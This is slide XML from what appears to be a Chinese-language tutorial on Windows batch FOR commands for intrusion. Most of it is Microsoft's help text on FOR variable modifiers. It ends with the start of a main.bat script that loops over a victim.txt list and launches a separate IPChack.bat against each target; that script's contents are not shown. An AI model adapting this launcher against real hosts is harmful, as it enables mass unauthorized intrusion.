        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>另外，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>變量參照的替換已被增強。您現在可以使用下列</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>選項語法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</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~I - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>刪除任何引號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(\)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，擴充 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個完全合格的路徑名</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個驅動器號</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>pI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個路徑</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個文件名</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>xI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個文件擴展名</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>sI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充的路徑只含有短名</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>aI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到文件的文件屬性</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>tI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到文件的日期</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>時間</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>zI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到文件的大小</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~$PATH:I - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查找列在路徑環境變量的目錄，並將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到找到的第一個完全合格的名稱。如果環境變量</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>未被定義，或者沒有找到文件，此組合鍵會擴充</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>空字符串</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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可以組合修飾符來得到多重結果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dpI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個驅動器號和路徑</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>nxI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個文件名和擴展名</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>fsI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>僅將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到一個帶有短名的完整路徑名</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dp$PATH:i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查找列在路徑環境變量的目錄，並將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到找到的第一個驅動器號和路徑。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ftzaI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴充到類似輸出線路的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DIR</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在以上例子中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PATH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可用其他有效數值代替。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語法用一個有效的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>FOR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>變量名終止。選取類似 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>%I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的大寫變量名比較易讀，而且避免與不分大小寫的組合鍵混淆。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>                                                      </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>以上是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>MS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的官方幫助，下面我們舉幾個例子來具體說明一下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令在入侵中的用途。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="305209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004B79F-8AE9-4AB8-8F71-29E8FBFDAF55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="555812"/>
            <a:ext cx="10515600" cy="5621151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>代碼雛形：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>--------------- cut here then save as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>batchfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(I call it main.bat ) ---------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@if \%1\==\\ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> usage</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@for /f \tokens=1,2,3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>delims</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>= \ %%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> in (victim.txt) do start call IPChack.bat %%</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> %%j %%k</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:usage</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo run this batch in dos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>modle.or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> just double-click it.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
